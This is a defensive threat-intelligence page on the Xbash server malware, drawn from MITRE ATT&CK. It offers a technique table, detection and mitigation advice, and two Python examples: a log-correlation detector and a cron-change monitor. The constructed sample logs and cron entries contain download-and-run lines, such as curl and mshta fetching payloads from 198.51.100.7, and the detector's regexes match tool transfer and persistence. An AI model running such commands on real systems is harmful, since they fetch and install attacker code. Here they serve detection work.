S0341: Xbash
Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[1]
Analyst context for executives and security teams
Xbash matters because it represents server-focused malware spanning Linux and Windows, with ATT&CK relationships that cover discovery, credential guessing, persistence, command-and-control, tool transfer, and impact behaviors such as data destruction or encryption. For leaders, the decision point is not a single signature for Xbash; it is whether server monitoring, identity controls, egress visibility, and recovery readiness are strong enough to handle malware that can move from discovery into operational disruption.
Executive priority
Prioritize Xbash as a resilience and server-security validation case. The supplied ATT&CK context links it to Linux and Windows servers and to techniques associated with password guessing, scheduled or startup persistence, web-based C2, ingress tool transfer, and destructive/encryption impact. Executives should ask whether critical servers have enforceable credential protections, monitored administrative scripting, controlled outbound web access, tested backups, and incident response playbooks that cover both Linux and Windows recovery evidence.
Technical view
ATT&CK provides no official detection text for Xbash, so SOC and IR teams should validate coverage through the related techniques rather than rely on a named-malware analytic. On Linux, confirm visibility into cron changes, process execution, network/service discovery, file transfer activity, outbound web connections, and suspicious ELF execution, including PyInstaller-style self-contained binaries where observable. On Windows, confirm telemetry for PowerShell, Visual Basic/JScript execution paths, mshta.exe and regsvr32.exe proxy execution, Registry Run Keys/Startup Folder changes, password guessing signals, and outbound web/dead-drop style resolver behavior. Because the object is malware targeting Linux and Microsoft Windows servers, detection engineering should test server telemetry specifically, not only endpoint workstations.
Likely telemetry
- Linux process execution and command-line telemetry
- Windows process creation and command-line telemetry
- PowerShell execution logs where enabled
- Script execution evidence for Visual Basic, JScript/JavaScript, mshta.exe, and regsvr32.exe
- Cron/crontab file and job modification events
Detection direction
- Build detection around the mapped ATT&CK techniques: T1016, T1046, T1053.003, T1059.001, T1059.005, T1059.007, T1071.001, T1102.001, T1105, T1110.001, T1203, T1218.005, T1218.010, T1485, T1486, and T1547.001.
- Tune separately for Linux and Windows servers; workstation-focused detections may miss cron persistence, Linux ELF execution, or server-to-server discovery patterns.
- Baseline legitimate administration before alerting on discovery commands, scripting engines, or scheduled tasks, since many related behaviors overlap with normal operations.
- Correlate weak signals: password guessing followed by scripting execution, tool transfer, persistence changes, outbound web traffic, and data modification is more meaningful than any single event.
- Validate egress monitoring for ordinary web protocols and legitimate web services used as resolvers, because ATT&CK notes C2 may blend into common HTTP/S-style traffic.
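As an added example (not code from the ATT&CK page, MITRE or Glexia), the correlation idea in the list above carried through in Python: each rule maps a log line to one of the mapped techniques, password guessing only counts once it repeats, and a host is flagged only when several distinct stages land inside one time window. Hostnames, addresses, file names and log lines are constructed, and the regexes are written for those constructed lines; on real telemetry they would be replaced with the product's field names.

```python
"""Weak-signal correlation across Xbash-related ATT&CK techniques.

Added example, not part of the ATT&CK object or the Glexia analysis.
All log lines, hosts and addresses below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# (technique, stage label, minimum hits inside the window, pattern).
# Patterns are illustrative and tuned to the constructed lines, not vendor signatures.
RULES = [
    ("T1110.001", "password_guessing", 5, re.compile(r"Failed password for")),
    ("T1105", "tool_transfer", 1, re.compile(r"\b(curl|wget)\b.*https?://")),
    ("T1053.003", "cron_persistence", 1, re.compile(r"\bcrontab\b|/etc/cron")),
    ("T1059.001", "powershell", 1, re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("T1218.005", "mshta_proxy_exec", 1, re.compile(r"\bmshta(\.exe)?\b", re.I)),
    ("T1071.001", "outbound_web", 1, re.compile(r"\begress\b.*\bdport=(80|443)\b")),
]

# Constructed sample telemetry, one "<ISO timestamp> <host> <message>" per line.
SAMPLE_LOGS = """\
2024-05-01T10:00:01 db-01 sshd: Failed password for root from 203.0.113.5 port 51234
2024-05-01T10:00:02 db-01 sshd: Failed password for root from 203.0.113.5 port 51236
2024-05-01T10:00:03 db-01 sshd: Failed password for root from 203.0.113.5 port 51238
2024-05-01T10:00:04 db-01 sshd: Failed password for admin from 203.0.113.5 port 51240
2024-05-01T10:00:05 db-01 sshd: Failed password for admin from 203.0.113.5 port 51242
2024-05-01T10:02:10 db-01 audit: exec /usr/bin/curl -s http://198.51.100.7/stage2 -o /tmp/update.sh
2024-05-01T10:02:30 db-01 audit: exec /usr/bin/crontab - (uid=0)
2024-05-01T10:03:00 db-01 firewall: egress src=10.0.5.21 dst=198.51.100.7 dport=80 proto=tcp
2024-05-01T11:15:00 web-02 audit: exec /usr/bin/crontab -e (uid=1000 tty=pts/0)
2024-05-01T12:00:00 win-03 sysmon: ProcessCreate mshta.exe http://198.51.100.7/a.hta
2024-05-01T12:00:05 win-03 sysmon: ProcessCreate powershell.exe -NoProfile -File update.ps1
"""


def parse(line):
    """Split a constructed log line into (timestamp, host, message)."""
    ts, host, msg = line.split(" ", 2)
    return datetime.fromisoformat(ts), host, msg


def tag(msg):
    """Return (technique, stage, threshold) for every rule whose pattern matches."""
    return [(tid, stage, need) for tid, stage, need, pat in RULES if pat.search(msg)]


def correlate(lines, window=timedelta(minutes=30), min_stages=3):
    """Return {host: sorted technique IDs} for hosts where at least
    `min_stages` distinct stages reach their thresholds inside one window."""
    events = defaultdict(list)  # host -> [(ts, technique, stage, threshold)]
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ts, host, msg = parse(line)
        for tid, stage, need in tag(msg):
            events[host].append((ts, tid, stage, need))

    alerts = {}
    for host, evs in events.items():
        evs.sort()
        best = set()
        # Slide the window forward from each event and keep the richest stage set.
        for i, (start, _, _, _) in enumerate(evs):
            hits = defaultdict(int)
            meta = {}
            for ts, tid, stage, need in evs[i:]:
                if ts - start > window:
                    break
                hits[stage] += 1
                meta[stage] = (tid, need)
            reached = {meta[s][0] for s, n in hits.items() if n >= meta[s][1]}
            if len(reached) > len(best):
                best = reached
        if len(best) >= min_stages:
            alerts[host] = sorted(best)
    return alerts


if __name__ == "__main__":
    for host, techniques in correlate(SAMPLE_LOGS.splitlines()).items():
        print(f"{host}: {len(techniques)} correlated stages -> {', '.join(techniques)}")
```

With the defaults only the Linux database host is flagged, because it shows repeated authentication failures, a download, a crontab write and outbound web traffic within three minutes; the single cron edit on the web host and the mshta plus PowerShell pair on the Windows host stay below the threshold. Lowering `min_stages` to 2 surfaces that Windows pair, which is exactly the kind of weaker combination the baseline step above is meant to tune against normal administration.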
Mitigation priorities
- Sequence controls around server resilience: harden exposed services, reduce unnecessary network services, and ensure vulnerability management covers server applications relevant to client-execution exploitation risk.
- Strengthen identity defenses against password guessing with strong password policy, lockout/rate-limiting where appropriate, and monitoring of repeated authentication failures.
- Restrict and monitor administrative scripting and living-off-the-land execution paths, including PowerShell, mshta.exe, regsvr32.exe, Visual Basic/JScript, and Linux cron usage.
- Limit outbound server internet access to business-required destinations and inspect web-protocol traffic where policy and architecture allow.
- Protect persistence locations such as cron entries, Registry Run Keys, and Startup Folders with change monitoring and least-privilege administration.
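The change-monitoring control in the last bullet, as an added Python example (not the page's own code): baseline the cron persistence locations by hashing their contents, then report additions, removals and edits. The directory tree, file names and cron lines are constructed inside a temporary directory so it runs offline; on a real Linux server the roots would be `/etc/crontab`, `/etc/cron.d` and `/var/spool/cron` (an assumption about the usual layout, adjust per distribution), and Windows Run keys and Startup folders would need a separate registry and folder snapshot that is not shown here.

```python
"""Baseline-and-diff monitoring of Linux cron persistence locations.

Added example, not code from the ATT&CK page, MITRE or Glexia. The cron
tree below is constructed in a temporary directory; nothing on the host
is read or changed.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def snapshot(roots):
    """Map every regular file under the given roots (files or directories)
    to the SHA-256 digest of its contents."""
    digests = {}
    for root in roots:
        root = Path(root)
        if root.is_file():
            files = [root]
        elif root.is_dir():
            files = sorted(p for p in root.rglob("*") if p.is_file())
        else:
            continue  # a missing root is not an error; it simply has no entries
        for path in files:
            digests[str(path)] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_snapshots(before, after):
    """Return the paths that were added, removed or modified between two snapshots."""
    common = before.keys() & after.keys()
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in common if before[p] != after[p]),
    }


def demo():
    """Build a constructed cron tree, baseline it, simulate a change and diff.
    Paths are returned relative to the temporary root so results are stable."""
    with tempfile.TemporaryDirectory() as tmp:
        cron_d = Path(tmp) / "cron.d"      # stands in for /etc/cron.d
        spool = Path(tmp) / "spool"        # stands in for /var/spool/cron
        cron_d.mkdir()
        spool.mkdir()
        (cron_d / "logrotate").write_text(
            "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
        (spool / "root").write_text("30 2 * * * /usr/local/bin/backup.sh\n")
        baseline = snapshot([cron_d, spool])

        # Constructed post-baseline changes: a new drop-in file and an edited root crontab.
        (cron_d / "update").write_text("*/5 * * * * root /tmp/update.sh\n")
        (spool / "root").write_text(
            "30 2 * * * /usr/local/bin/backup.sh\n*/10 * * * * /tmp/update.sh\n")
        current = snapshot([cron_d, spool])

        changes = diff_snapshots(baseline, current)
        return {k: [os.path.relpath(p, tmp) for p in v] for k, v in changes.items()}


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths or '-'}")
```

In production the baseline would be stored off-host and the comparison scheduled, and every reported path would be reviewed against the change records from the least-privilege administration process the bullet describes; an entry that appears without a matching change record is the signal worth alerting on.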
Analyst notes and limits
The strongest decision value in this object comes from the relationship set: Xbash is connected to discovery, execution, persistence, credential access, command-and-control, ingress transfer, and impact techniques. The official description states it targeted Linux and Microsoft Windows servers, was developed in Python, converted to a Linux ELF using PyInstaller, and has been tied to Iron Group, a group known for previous ransomware attacks. Treat attribution as source context, not as a basis for assuming current activity or exposure.
ATT&CK provides no official detection guidance for this object, and the object-level tactics are not specified. The relationship descriptions are technique-level context and may include platforms beyond Xbash’s stated Windows and Linux scope; local validation is required before claiming coverage. This take does not assert active exploitation, customer exposure, or guaranteed detection.
Xbash
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1071.001 | Web Protocols (sub-technique) | Xbash uses HTTP for C2 communications. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1485 | Data Destruction | Xbash has destroyed Linux-based databases as part of its ransomware capabilities. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1059.005 | Visual Basic (sub-technique) | Xbash can execute malicious VBScript payloads on the victim's machine. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1218.005 | Mshta (sub-technique) | Xbash can use mshta for executing scripts. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder (sub-technique) | Xbash can create a Startup item for persistence if it determines it is on a Windows system. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1053.003 | Cron (sub-technique) | Xbash can create a cronjob for persistence if it determines it is on a Linux system. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1203 | Exploitation for Client Execution | Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution. (Citation: Unit42 Xbash Sept 2018) (Citation: Trend Micro Xbash Sept 2018) |
| Enterprise | T1105 | Ingress Tool Transfer | Xbash can download additional malicious files from its C2 server. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1059.001 | PowerShell (sub-technique) | Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1059.007 | JavaScript (sub-technique) | Xbash can execute malicious JavaScript payloads on the victim's machine. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1046 | Network Service Discovery | Xbash can perform port scanning of TCP and UDP ports. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1486 | Data Encrypted for Impact | Xbash has maliciously encrypted victims' database systems and demanded a cryptocurrency ransom be paid. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1110.001 | Password Guessing (sub-technique) | Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing, as well as attempt to brute force services with open ports. (Citation: Unit42 Xbash Sept 2018) (Citation: Trend Micro Xbash Sept 2018) |
| Enterprise | T1218.010 | Regsvr32 (sub-technique) | Xbash can use regsvr32 for executing scripts. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1016 | System Network Configuration Discovery | Xbash can collect IP addresses and local intranet information from a victim's machine. (Citation: Unit42 Xbash Sept 2018) |
| Enterprise | T1102.001 | Dead Drop Resolver (sub-technique) | Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list. (Citation: Unit42 Xbash Sept 2018) |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.2 | | Current bundle | ad8948d71cab… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Unit42 Xbash Sept 2018: Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
- [2] Xbash (Citation: Unit42 Xbash Sept 2018)
- [3] mitre-attack S0341
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.